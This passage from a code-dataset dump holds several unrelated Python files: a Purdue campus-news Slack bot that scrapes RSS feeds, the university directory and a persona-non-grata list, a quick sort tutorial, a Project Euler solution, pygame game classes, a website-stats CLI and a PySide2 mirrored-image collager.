\"https://www.purdue.edu/newsroom/rss/faculty_staff.xml\",\n \"https://www.purdue.edu/newsroom/rss/FeaturedNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/general.xml\",\n \"https://www.purdue.edu/newsroom/rss/HealthMedNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/hrnews.xml\",\n \"https://www.purdue.edu/newsroom/rss/InfoTech.xml\",\n 
\"https://www.purdue.edu/newsroom/rss/LifeNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/LifeSciNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/OTCNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/outreach.xml\",\n \"https://www.purdue.edu/newsroom/rss/PhysicalSciNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/PRFAdminNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/ResearchNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/StudentNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/VetMedNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/AgNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/DiscoParkNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/EdNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/engineering.xml\",\n \"https://www.purdue.edu/newsroom/rss/HHSNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/ITaPNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/CLANews.xml\",\n \"https://www.purdue.edu/newsroom/rss/LibrariesNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/KrannertNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/NEESnews.xml\",\n \"https://www.purdue.edu/newsroom/rss/NursingNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/PharmacyNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/president.xml\",\n \"https://www.purdue.edu/newsroom/rss/PRFNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/ScienceNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/TechNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/VetNews.xml\",\n]\n\n\ndef directory_search(searchName: str) -> Dict[str, Any]:\n \"\"\"Helper function to search names in the Purdue Directory\n\n Arguments:\n searchName (str): the name to be queried in the Purdue Directory.\n\n Returns:\n A Dict in Slack format.\n \"\"\"\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += \"HIGH:!DH:!aNULL\"\n try:\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += (\n \"HIGH:!DH:!aNULL\"\n )\n except AttributeError:\n # no pyopenssl support used / needed / available\n pass\n\n # POST UP LEBRON!!!\n r = requests.post(\"https://purdue.edu/directory\", data={\"searchString\": searchName})\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n result = soup.findAll(id=\"results\")\n\n ret_list = []\n\n for row in result[0].findAll(\"ul\")[0].findAll(\"li\"):\n tmp = []\n # find the name\n for h2 in row.findAll(\"h2\"):\n tmp.append(h2.text)\n\n # find the rest of the information\n for td in row.findAll(\"td\"):\n tmp.append(td.text)\n\n ret_list.append(tmp)\n\n result_str = \"results\" if len(ret_list) else \"result\"\n\n ret_blocks = {\n \"blocks\": [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f'Found *{len(ret_list)}* {result_str} for: \"{searchName}\"',\n },\n },\n {\"type\": \"divider\"},\n ]\n }\n\n for result in ret_list:\n ret_blocks[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"{result[0]} \\nemail: {result[2]}\\ncampus: {result[3]}\\ncollege: {result[4]}\",\n },\n }\n )\n\n return ret_blocks\n\n\ndef get_pngs() -> List[List[str]]:\n \"\"\"Retrieves a list of three-wide arrays from the Purdue PNG website.\n\n Returns:\n A list of rows representing information about PNGs.\n \"\"\"\n r = requests.get(\n \"https://www.purdue.edu/ehps/police/assistance/stats/personanongrata.html\"\n )\n\n soup = BeautifulSoup(r.text, \"html.parser\")\n table = soup.find(summary=\"Persona nongrata list\")\n\n ret_list = []\n\n for tr in table.find_all(\"tr\"):\n td = tr.find_all(\"td\")\n row = 
[i.text.strip() for i in td]\n        if len(row) != 0:\n            ret_list.append(row)\n\n    return ret_list\n\n\ndef send_slack(title: str, link: str, date: str, is_pr: bool = False) -> None:\n    \"\"\"A helper function that sends messages to a specified Slack channel.\n\n    Arguments:\n        title (str): A string representing the title of the message.\n        link (str): A string representing a possible link to attach with the message\n        date (str): When the press release was released.\n        is_pr (bool): A boolean representing whether the incoming Slack message\n            is a press release or otherwise.\n\n    Returns:\n        None\n    \"\"\"\n\n    if os.getenv(\"SEND_SLACK\") != \"True\":\n        return\n\n    if \"http\" not in link:\n        link = \"http://{}\".format(link)\n\n    payload = {\n        \"channel\": os.getenv(\"SLACK_CHANNEL\"),\n        \"text\": title,\n        \"token\": os.getenv(\"SLACK_TOKEN\"),\n        \"blocks\": [],\n    }\n\n    block_array = [\n        {\"type\": \"section\", \"text\": {\"type\": \"mrkdwn\", \"text\": f\"{title}\"}},\n        {\n            \"type\": \"context\",\n            \"elements\": [{\"type\": \"mrkdwn\", \"text\": f\"Posted on {date}\"}],\n        },\n    ]\n\n    if is_pr:\n        block_array[0][\"text\"] = {\"type\": \"mrkdwn\", \"text\": f\"<{link}|{title}>\"}\n        block_array[0][\"accessory\"] = {\n            \"type\": \"button\",\n            \"text\": {\"type\": \"plain_text\", \"text\": \"Take Me!\"},\n            \"value\": \"take\",\n            \"action_id\": \"button\",\n        }\n\n    payload[\"blocks\"] = json.dumps(block_array)\n\n    # logging.debug(payload)\n    r = requests.post(\"https://slack.com/api/chat.postMessage\", params=payload)\n\n    r.raise_for_status()\n\n\ndef get_bylines(query: str) -> List[Dict[str, Any]]:\n    \"\"\"Helper function to retrieve reporter bylines for the current pay period.\n\n    Returns:\n        List[Dict[str, Any]]\n            A list of Slack blocks containing reporter information.\n    \"\"\"\n\n    date_regex_string = r\"[0-9]*[0-9]/[0-9]*[0-9]/[12][09][012][0-9]\"\n\n    date_regex_match = re.findall(date_regex_string, query)\n\n    if len(date_regex_match) == 2:\n        start_str = date_regex_match[0]\n        end_str = date_regex_match[1]\n    else:\n        d = datetime.now()\n        if d.day <= 15:\n            start_str = f\"{d.month}/1/{d.year}\"\n            end_str = f\"{d.month}/15/{d.year}\"\n        else:\n            start_str = f\"{d.month}/16/{d.year}\"\n            end_str = f\"{d.month}/{d.day}/{d.year}\"\n\n    campus_search_string = f\"https://www.purdueexponent.org/search/?q=&nsa=eedition&t=article&c[]=campus&l=100&s=start_time&sd=desc&f=rss&d1={start_str}&d2={end_str}\"\n    city_search_string = f\"https://www.purdueexponent.org/search/?q=&nsa=eedition&t=article&c[]=city_state&l=100&s=start_time&sd=desc&f=rss&d1={start_str}&d2={end_str}\"\n    sports_search_string = f\"https://www.purdueexponent.org/search/?q=&nsa=eedition&t=article&c[]=sports&l=100&s=start_time&sd=desc&f=rss&d1={start_str}&d2={end_str}\"\n\n    campus_feed = feedparser.parse(campus_search_string)\n    city_feed = feedparser.parse(city_search_string)\n    sports_feed = feedparser.parse(sports_search_string)\n\n    entry_list = campus_feed.entries + city_feed.entries + sports_feed.entries\n\n    bylines = process_bylines(entry_list)\n\n    ret_blocks = {\"blocks\": []}\n\n    ret_blocks[\"blocks\"].append(\n        {\n            \"type\": \"section\",\n            \"text\": {\n                \"type\": \"mrkdwn\",\n                \"text\": f\"{len(bylines.keys())} reporters wrote articles between {start_str} and {end_str}\",\n            },  # noqa\n        }  # noqa\n    )\n\n    ret_blocks[\"blocks\"].append({\"type\": \"divider\"})\n\n    for reporter in bylines.keys():\n        res_articles = \"\"\n        for article in bylines[reporter][\"articles\"]:\n            res_articles = res_articles + f\"* {article}\\n\"\n        res_string = f\"{reporter}: 
{bylines[reporter]['count']} \\n{res_articles}\"\n ret_blocks[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": res_string,\n }, # noqa\n } # noqa\n )\n\n return ret_blocks\n\n\ndef get_quote() -> Dict[str, Any]:\n \"\"\"Helper function to get and process daily quotes.\"\"\"\n\n r = requests.get(\"http://api.quotable.io/random\")\n\n data = r.json()\n\n tipp_daily_total = 0\n\n corona_r = requests.get(\n \"https://hub.mph.in.gov/api/3/action/datastore_search?resource_id=8b8e6cd7-ede2-4c41-a9bd-4266df783145&q=Tippecanoe\"\n )\n\n while len(corona_r.json()[\"result\"][\"records\"]) > 0:\n corona_data = corona_r.json()[\"result\"]\n tipp_daily_total += sum(\n [record[\"COVID_COUNT\"] for record in corona_data[\"records\"]]\n )\n corona_r = requests.get(\n \"https://hub.mph.in.gov\" + corona_data[\"_links\"][\"next\"]\n )\n\n ret_blocks = {\"blocks\": []}\n\n ret_blocks[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"good morning! here's a quote to get your day started ʕ•́ᴥ•̀ʔっ\\n\\\"{data['content']}\\\" - {data['author']}\\nthere are {tipp_daily_total} COVID-19 cases in tippecanoe county, according to the isdh (╥﹏╥)\",\n }, # noqa\n } # noqa\n )\n\n payload = {\n \"channel\": os.getenv(\"SLACK_RANDOM\"),\n \"text\": \"hey! it's ur morning update (づ。◕‿‿◕。)づ\",\n \"token\": os.getenv(\"SLACK_TOKEN\"),\n \"blocks\": json.dumps(ret_blocks[\"blocks\"]),\n }\n\n r = requests.post(\"https://slack.com/api/chat.postMessage\", params=payload)\n\n r = requests.get(\n \"https://hub.mph.in.gov/api/3/action/datastore_search_sql?sql=SELECT%20%22DATE%22,%20SUM(%22COVID_COUNT%22)%20as%20COVID_COUNT%20from%20%2246b310b9-2f29-4a51-90dc-3886d9cf4ac1%22%20WHERE%20%22COUNTY_NAME%22%20LIKE%20%27Tippecanoe%27%20GROUP%20BY%20%22DATE%22%20ORDER%20BY%20%22DATE%22%20DESC%20LIMIT%2030\"\n )\n\n covid_list = []\n index = []\n columns = [\"covid_count\"]\n\n for record in r.json()[\"result\"][\"records\"]:\n covid_list.append(int(record[\"covid_count\"]))\n index.append(pd.to_datetime(record[\"DATE\"]))\n\n df = pd.DataFrame(covid_list, index=index, columns=columns)\n\n filename = datetime.now().strftime(\"%b_%d_%Y\") + \".png\"\n\n series = df[\"covid_count\"][::-1]\n\n sma = []\n window = []\n\n for value in series:\n if len(window) < 7:\n window.append(value)\n else:\n window.pop(0)\n window.append(value)\n\n sma.append(np.average(window))\n\n with plt.style.context(\"fivethirtyeight\"):\n plt.figure(figsize=(16, 9))\n plt.title(\n f\"no. of new cases per day in last 30 days ({datetime.fromisoformat(r.json()['result']['records'][0]['DATE']).strftime('%b %d, %Y')})\"\n )\n plt.xticks(rotation=30)\n plt.bar(\n np.arange(len(index)), df[\"covid_count\"][::-1], label=\"daily no. 
of cases\"\n )\n plt.plot(sma, color=\"gold\", label=\"seven day moving average\")\n plt.xticks(range(len(index)), [date.strftime(\"%b %d\") for date in index[::-1]])\n plt.legend()\n plt.savefig(filename, bbox_inches=\"tight\", pad_inches=0.5)\n\n payload = {\n \"channels\": [os.getenv(\"SLACK_RANDOM\")],\n \"text\": \"look at this graph 🎶\",\n \"file\": filename,\n \"token\": os.getenv(\"SLACK_TOKEN\"),\n }\n\n graph_file = {\"file\": (filename, open(filename, \"rb\"), \"png\")}\n\n r = requests.post(\n \"https://slack.com/api/files.upload\", params=payload, files=graph_file\n )\n\n r.raise_for_status()\n\n return ret_blocks\n\n\ndef rss_reader():\n conn = get_database_connection()\n\n for url in xml_urls:\n response = requests.get(url)\n if response.status_code == 404:\n continue\n feed = atoma.parse_rss_bytes(response.content)\n for post in feed.items:\n\n query_result = conn.run(\n \"select true from press_releases where title=:title and link=:link\",\n title=post.title,\n link=post.link,\n date=post.pub_date,\n )\n\n if len(query_result) > 0:\n continue\n\n query_result = conn.run(\n \"insert into press_releases values (:title, :link, :date)\",\n title=post.title,\n link=post.link,\n date=post.pub_date,\n )\n\n send_slack(\n post.title,\n post.link,\n post.pub_date.strftime(\"(%Y/%m/%d)\"),\n is_pr=True,\n )\n\n conn.commit()\n\n for row in get_pngs():\n if len(row[0]) == 0:\n continue\n\n query_result = conn.run(\n \"select true from pngs where name=:name and location=:location and expiration=:expiration\",\n name=row[0],\n location=row[1],\n expiration=row[2],\n )\n\n if len(query_result) > 0:\n continue\n\n query_result = conn.run(\n \"insert into pngs (name, location, expiration) values (:name, :location, :expiration)\",\n name=row[0],\n location=row[1],\n expiration=row[2],\n )\n print(f\"PNG issued to {row[0]} expiring on {row[2]}. Banned from {row[1]}\")\n send_slack(\n f\"PNG issued to {row[0]} expiring on {row[2]}. Banned from {row[1]}\",\n \"\",\n \"\",\n )\n\n conn.commit()\n conn.close()\n","repo_name":"fatcat2/tippecanews","sub_path":"tippecanews/utils/retrievers.py","file_name":"retrievers.py","file_ext":"py","file_size_in_byte":14475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17232649389","text":"# Quick Sort is a widely used sorting algorithm that follows the divide and conquer paradigm. It's an efficient, in-place method offering superior performance in real-world sorting applications. \n\n# The worst-case time complexity is O(n^2), however, on average, it performs impressively with a time complexity of O(n log n).\n\n# The algorithm operates by choosing a 'pivot' from the array and partitioning the remaining elements into two sub-arrays, according to whether they are less than or greater than the pivot. \n# The pivot selection and partitioning steps occur in-place, meaning they require minimal additional space.\n# After partitioning, the algorithm recursively applies the same logic to the sub-arrays. Over several iterations, this results in a fully sorted array.\n\n# Algorithm:\n# 1. The quick_sort function initially selects a pivot element from the array.\n# 2. Using the partition function, it organizes the array such that elements lesser than the pivot come before it and those greater come after it.\n# 3. 
The quick_sort function is then recursively applied to the sub-arrays formed by the partitioning step.\n\n# Time Complexity: On average, Quick Sort operates in O(n log n), where 'n' is the number of elements. In the worst-case scenario, its performance degrades to O(n^2).\n\n# Space Complexity: The space complexity of Quick Sort is O(log n), due to the recursive nature of the algorithm storing function calls on the call stack.\n\n# Implementation of Quick Sort in Python:\n\ndef partition(array, low, high):\n # Choose the rightmost element as pivot\n pivot = array[high]\n\n i = low - 1\n\n # Partitioning: move all elements smaller than pivot to the left, greater to the right\n for j in range(low, high):\n if array[j] <= pivot:\n i = i + 1\n (array[i], array[j]) = (array[j], array[i])\n\n # Swap pivot element with the element at the i-th position\n (array[i + 1], array[high]) = (array[high], array[i + 1])\n\n # Return the position of the pivot\n return i + 1\n\ndef quick_sort(array, low, high):\n if low < high:\n # Find pivot position\n pi = partition(array, low, high)\n\n # Recursively perform quicksort on the partitioned sub-arrays\n quick_sort(array, low, pi - 1)\n quick_sort(array, pi + 1, high)\n\n# Sample Input\ninput_array = [8, 7, 2, 1, 0, 9, 6]\nsize = len(input_array)\n\nprint(\"Original Array: \", input_array)\nquick_sort(input_array, 0, size - 1)\n\nprint(\"Sorted Array: \", input_array)\n\n# Sample Input\n# input_array = [8, 7, 2, 1, 0, 9, 6]\n\n\n# Sample Output\n# input_array = [0, 1, 2, 6, 7, 8, 9]\n\n# Note: Quick Sort algorithm works by manipulating the input array in-place and doesn't work well with arrays that are already sorted or nearly sorted.","repo_name":"avantikachauhann/Algorithm-Alchemy","sub_path":"Python/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"38318332651","text":"import pygame\nfrom ui.ui_tool_tip import UITooltip\n\n\nclass UITextButton(pygame.sprite.Sprite):\n def __init__(self, position, dimensions, text, font, ui_group, tool_tip_text=None):\n super().__init__(ui_group)\n self.ui_group = ui_group\n self.font = font\n self.text = text\n\n # support for an optional 'tool tip' element attached to this button\n self.tool_tip_text = tool_tip_text\n self.tool_tip = None\n\n # colours, we could grab these from a separate colour theme class that we use across ui elements, much like a\n # css file provides colours and styles to a group of HTML we pages\n self.text_colour = pygame.Color('#000000')\n self.normal_colour = pygame.Color('#f9eaae')\n self.hover_colour = pygame.Color('#cdf9ae')\n\n # different states our button can be in, could use a state machine for this if you wanted\n # could also add a 'selected' state like windows has.\n self.hovered = False\n self.held = False\n self.pressed = False\n\n # time the hovering\n self.hover_time = 0.0\n self.tool_tip_appear_time = 1.0\n\n self.text_surface = self.font.render(self.text, True, self.text_colour)\n\n self.image = pygame.Surface(dimensions)\n self.rect = self.image.get_rect(x=position.x, y=position.y)\n\n # this helps us draw the text in the center of our button\n self.text_centred_rect = self.text_surface.get_rect(centerx=self.rect.centerx-self.rect.x,\n centery=self.rect.centery-self.rect.y)\n\n self.redraw()\n\n def shutdown(self):\n self.kill()\n if self.tool_tip is not None:\n self.tool_tip.kill()\n\n def update(self, time_delta, 
window_surface):\n mouse_x, mouse_y = pygame.mouse.get_pos()\n\n if self.rect.collidepoint(mouse_x, mouse_y):\n if not self.hovered:\n self.hovered = True\n self.hover_time = 0.0\n self.redraw()\n\n if self.tool_tip is None and self.tool_tip_text is not None and self.hover_time > self.tool_tip_appear_time:\n self.tool_tip = UITooltip(self.tool_tip_text, self.ui_group)\n self.tool_tip.find_valid_position(pygame.math.Vector2(mouse_x, self.rect.centery), window_surface)\n\n self.hover_time += time_delta\n\n else:\n if self.hovered:\n self.hovered = False\n self.redraw()\n if self.tool_tip is not None:\n self.tool_tip.kill()\n self.tool_tip = None\n\n if self.held:\n self.held = False\n\n def process_event(self, event):\n processed_event = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n mouse_x, mouse_y = event.pos\n if self.rect.collidepoint(mouse_x, mouse_y):\n self.held = True\n processed_event = True\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n mouse_x, mouse_y = event.pos\n if self.rect.collidepoint(mouse_x, mouse_y):\n if self.held:\n self.held = False\n processed_event = True\n self.pressed = True\n\n return processed_event\n\n def redraw(self):\n if self.hovered:\n self.image.fill(self.hover_colour)\n else:\n self.image.fill(self.normal_colour)\n\n self.image.blit(self.text_surface, self.text_centred_rect)\n\n def check_pressed_and_reset(self):\n if self.pressed:\n self.pressed = False\n return True\n else:\n return False\n","repo_name":"MyreMylar/nautical_adventure","sub_path":"ui/ui_text_button.py","file_name":"ui_text_button.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30665054004","text":"# coding: utf-8\n\n'''\nIt is possible to show that the square root of two can be expressed as an infinite continued fraction.\n\nsqrt(2) = 1 + 1/(2 + 1/(2 + 1/(2 + ... 
))) = 1.414213...\n\nBy expanding this for the first four iterations, we get:\n\n1 + 1/2 = 3/2 = 1.5\n1 + 1/(2 + 1/2) = 7/5 = 1.4\n1 + 1/(2 + 1/(2 + 1/2)) = 17/12 = 1.41666...\n1 + 1/(2 + 1/(2 + 1/(2 + 1/2))) = 41/29 = 1.41379...\n\nThe next three expansions are 99/70, 239/169, and 577/408, but the eighth expansion, 1393/985, is the first example where the number of digits in the numerator exceeds the number of digits in the denominator.\n\nIn the first one-thousand expansions, how many fractions contain a numerator with more digits than denominator?\n'''\n\n\n# from http://math.arizona.edu/~thakur/cf2.pdf,\n# Denominator D(n+1) = D(n) + N(n) | Numerator N(n+1) = N(n) + 2*D(n)\n\n\ndef main():\n    numerator, denominator, result = 3, 2, 0\n    for _ in range(10 ** 3):\n        numerator, denominator = numerator + 2 * denominator, numerator + denominator\n        if len(str(numerator)) > len(str(denominator)):\n            result += 1\n    return result\n\n\nif __name__ == '__main__':\n    print(main())\n    # 153 in 3.98ms\n","repo_name":"adrienbrunet/EulerProject","sub_path":"problem_057.py","file_name":"problem_057.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27407267573","text":"import pygame\nfrom datetime import datetime, timedelta\nfrom player import Player\nfrom settings import *\nfrom bullet import Bullet\n\n\nclass Gamer(Player):\n\n    def __init__(self, aliens, gamers, game_over):\n        Player.__init__(self, GAME_WIDTH - PLAYER_WIDTH / 2, GAME_HIGH - PLAYER_HEIGHT / 2, image=\"sniper\")\n        self.aliens = aliens\n        self.gamers = gamers\n        self.last_shot = datetime.now()\n        self.game_over = game_over\n\n    def update(self, *arg, **kwargs) -> None:\n        keys = pygame.key.get_pressed()\n        if keys[pygame.K_LEFT]:\n            self.rect.left -= 5\n            if self.rect.left < 0:\n                self.rect.left = 0\n        if keys[pygame.K_RIGHT]:\n            self.rect.right += 5\n            if self.rect.right > GAME_WIDTH:\n                self.rect.right = GAME_WIDTH\n        if keys[pygame.K_UP]:\n            now = datetime.now()\n            if now - self.last_shot < BETWEEN_SHOTS:\n                return\n            print(\"Pew-pew\")\n            bullet = Bullet(self, self.aliens, self.gamers, self.game_over)\n            self.last_shot = now\n            self.gamers.add(bullet)\n","repo_name":"Nastya-Arshba/space-invaders","sub_path":"gamer.py","file_name":"gamer.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45745592058","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis module receives the command line input from the user in the form:\nexecutable_python_file arguments...\nAnd then delegates the command functionalities to the respective action modules\n\n\"\"\"\n\nimport argparse\nfrom command_functions.call_crawler import call_crawler\nfrom command_functions.call_list_reports import call_list_reports\nfrom command_functions.call_link_reports import call_link_reports\nimport rlcompleter\nimport os\nimport sys\nimport config\n\npath = os.getcwd()\nsys.path.append('/'.join([path, 'web_crawler']))\n\ndef invalid_command() -> None:\n    print(\"Invalid command entered..\")\n    \nif __name__ == \"__main__\":\n    \"\"\"\n    This function receives the command line arguments from the user and passes the arguments to the corresponding modules to be processed\n    \"\"\"\n\n    parser = argparse.ArgumentParser(\"Processing input commands\")\n\n    subparsers = parser.add_subparsers(help='commands', dest = \"input_command\")\n\n    # A crawl command\n    crawl_parser = subparsers.add_parser('crawl', help='crawl 
website')\n    crawl_parser.add_argument('url', help='The website url to be crawled')\n\n    # A list-reports command\n    list_reports_parser = subparsers.add_parser('list-reports', help='lists all the websites crawled')\n\n    # A link-reports command\n    link_reports_parser = subparsers.add_parser('link-reports', help='shows the statistics of the website')\n    link_reports_parser.add_argument('report-id', help='report id of the website')\n    link_reports_parser.add_argument('--no-cmd', action = 'store_true',\n                    help='Does not print the statistics of the website in the command line')\n    link_reports_parser.add_argument('--yaml', action = 'store_true',\n                    help='Gives the statistics of the website in yaml format')\n    link_reports_parser.add_argument('--csv', action = 'store_true',\n                    help='Gives the statistics of the website in csv format')\n    link_reports_parser.add_argument('--json', action = 'store_true',\n                    help='Gives the statistics of the website in json format')\n\n    arguments=parser.parse_known_args()\n    config.logger.info(\"Arguments received from command line.\")\n    \n    #argument-value dictionary\n    commands = vars(arguments[0])\n    \n    if len(arguments[1]) != 0: \n        print(\"Too many arguments provided!\")\n        sys.exit()\n\n    # argument-function dictionary\n    functions = {\n        \"crawl\" : call_crawler,\n        \"list-reports\" : call_list_reports,\n        \"link-reports\" : call_link_reports\n    }\n    \n    if commands[\"input_command\"] in functions:\n        call_function = commands.pop('input_command')\n        functions.get(call_function)(commands)\n    else:\n        invalid_command() \n    \n    ","repo_name":"Rohit102497/Command_Line_Utility","sub_path":"website-stats.py","file_name":"website-stats.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2525959395","text":"#!/usr/bin/env python3\n\"\"\"\n    Launch GUI to create mirrored tiled images from source image file.\n    \n    File: collager.py\n    Author: Suzanne Berger\n    Date created: 03/15/2018\n    Updated: 05/16/2022\n    Python Version: 3.9\n\"\"\"\n\nimport sys\nimport os\nimport logging\nfrom pprint import pprint\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\nfrom PySide2 import QtUiTools\n\n#########################################################\n# globals\n#########################################################\n\nVERSION = \"V02\"\n\nlogging.basicConfig(level=logging.INFO)\nlogging.info(f\" {sys.argv[0]} Version {VERSION}\")\n\n#########################################################\n# CollagerWin\n#########################################################\n\nclass CollagerWin(QtWidgets.QWidget):\n\n    def __init__(self, parent=None):\n        \"\"\" Create CollagerWin object inherited from QWidget. \"\"\"\n        QtWidgets.QWidget.__init__(self, parent)\n        \n        # initialize object attributes\n        # tiled images are stored in dictionary before saving to files\n        self.cllimagemap = {}\n        self.image_dir = self.image_file = None\n        self.empty_pixmap = QtGui.QPixmap(300, 200)\n        self.empty_pixmap.fill(QtGui.QColor(120, 120, 160))\n        \n        # initialize user interface and signal slot connections\n        self._initUI()\n        self._connectSignals()\n        self.show()\n\n    def _initUI(self):\n        \"\"\" Create widgets and layout. 
\"\"\"\n self.setGeometry(100, 100, 800, 700)\n self.setWindowTitle('Collager')\n \n self.src_label = QtWidgets.QLabel('Source Image File')\n self.src_label.setFixedSize(131,21)\n self.src_lineEdit = QtWidgets.QLineEdit()\n self.src_lineEdit.setFixedHeight(21)\n self.src_lineEdit.setMinimumWidth(500)\n self.src_button = QtWidgets.QPushButton('Browse')\n self.src_button.setFixedSize(91, 35)\n\n src_layout = QtWidgets.QHBoxLayout()\n src_layout.addWidget(self.src_label)\n src_layout.addWidget(self.src_lineEdit)\n src_layout.addWidget(self.src_button)\n\n headBox = QtWidgets.QGroupBox()\n headBox.setFixedHeight(60)\n headBox.setMinimumWidth(740)\n headBox.setLayout(src_layout)\n \n imageFrame = QtWidgets.QGroupBox()\n imageFrame.setMinimumSize(760, 600)\n \n # QGroupBox labels denote image tile pattern\n self.cllbox0 = QtWidgets.QGroupBox('N-H-V-HV')\n self.mkbox('cll0', self.cllbox0)\n \n self.cllbox1 = QtWidgets.QGroupBox('H-N-HV-V')\n self.mkbox('cll1', self.cllbox1)\n\n self.cllbox2 = QtWidgets.QGroupBox('V-HV-N-H')\n self.mkbox('cll2', self.cllbox2)\n \n self.cllbox3 = QtWidgets.QGroupBox('HV-V-H-N')\n self.mkbox('cll3', self.cllbox3)\n \n cll_layout = QtWidgets.QGridLayout()\n cll_layout.addWidget(self.cllbox0, 0, 0)\n cll_layout.addWidget(self.cllbox1, 0, 1)\n cll_layout.addWidget(self.cllbox2, 1, 0)\n cll_layout.addWidget(self.cllbox3, 1, 1)\n imageFrame.setLayout(cll_layout)\n \n status_label = QtWidgets.QLabel('Status')\n status_label.setFixedSize(61,21)\n self.status_lineEdit = QtWidgets.QLineEdit(\"Ready:\")\n self.status_lineEdit.setFixedHeight(21)\n self.status_lineEdit.setMinimumWidth(600)\n status_layout = QtWidgets.QHBoxLayout()\n status_layout.addWidget(status_label)\n status_layout.addWidget(self.status_lineEdit)\n \n self.buttonbox = QtWidgets.QDialogButtonBox(QtWidgets.QDialogButtonBox.Save |\n QtWidgets.QDialogButtonBox.Reset |\n QtWidgets.QDialogButtonBox.Close)\n \n mainLayout = QtWidgets.QVBoxLayout()\n mainLayout.addWidget(headBox)\n mainLayout.addWidget(imageFrame)\n mainLayout.addLayout(status_layout)\n mainLayout.addWidget(self.buttonbox)\n self.setLayout(mainLayout)\n \n def _connectSignals(self):\n \"\"\" Create signal slot connections. \"\"\"\n self.src_button.clicked.connect(self.on_src_clicked)\n self.buttonbox.rejected.connect(self.close)\n self.buttonbox.button(QtWidgets.QDialogButtonBox.Save).clicked.connect(self.save)\n self.buttonbox.button(QtWidgets.QDialogButtonBox.Reset).clicked.connect(self.reset)\n \n def closeEvent(self, event):\n event.accept()\n \n def save(self):\n \"\"\" Save checked tiled images into same directory as source image file. 
\"\"\"\n if self.image_dir is None:\n self.status_lineEdit.setText(\"Unable to save without directory setting\")\n return\n \n self.status_lineEdit.setText(f\"Saving collages to directory: {self.image_dir}\")\n \n # iterate through dictionary to get each QGroupBox object and tiled QImage\n # only save QImage if QGroupBox object is checked\n for cllkey, value in self.cllimagemap.items():\n this_groupBox = value[0]\n if this_groupBox.isChecked():\n this_lineEdit_objectname = f\"{cllkey}_lineEdit\"\n this_lineEdit = this_groupBox.findChild(QtWidgets.QLineEdit, this_lineEdit_objectname)\n this_path = os.path.normpath(os.path.join(self.image_dir, this_lineEdit.text()))\n this_image = value[-1]\n this_image.save(this_path, quality=100)\n logging.info(f\"Saving collage {cllkey} to image file {this_path}\")\n \n self.status_lineEdit.setText(f\"Successfully saved all collages to {self.image_dir}\")\n \n def reset(self):\n \"\"\" Reset GUI by clearing entries and setting image boxes to original solid grey. \"\"\"\n logging.info(\"Resetting collage window\")\n self.src_lineEdit.clear()\n self.image_dir = self.image_file = None\n for cllkey, value in self.cllimagemap.items():\n this_groupBox = self.cllimagemap[cllkey][0]\n this_groupBox.setChecked(True)\n self.cllimagemap[cllkey] = [this_groupBox]\n \n this_lineEdit_objectname = f\"{cllkey}_lineEdit\"\n this_lineEdit = this_groupBox.findChild(QtWidgets.QLineEdit, this_lineEdit_objectname)\n this_lineEdit.clear()\n \n this_label_objectname = f\"{cllkey}_label\"\n this_label = this_groupBox.findChild(QtWidgets.QLabel, this_label_objectname)\n this_label.setPixmap(self.empty_pixmap)\n \n self.status_lineEdit.setText(\"Ready:\")\n\n def on_src_clicked(self):\n \"\"\" Launch file selection dialog to load source image to be tiled. \"\"\"\n self.srcfile = QtWidgets.QFileDialog.getOpenFileName(self,'Load Image File','/Users/suzanneberger/Pictures',\n \"image files (*.jpg *.png *.tif)\")[0]\n\n if self.srcfile is not None:\n self.src_lineEdit.setText(self.srcfile)\n self.image_dir,self.image_file = os.path.split(self.srcfile)\n self.mkcllpix()\n\n def mkbox(self, cllkey, this_groupBox):\n \"\"\" Setup QGroupBox to contain tiled image and checkable label.\n \n QGroupBox object is stored in 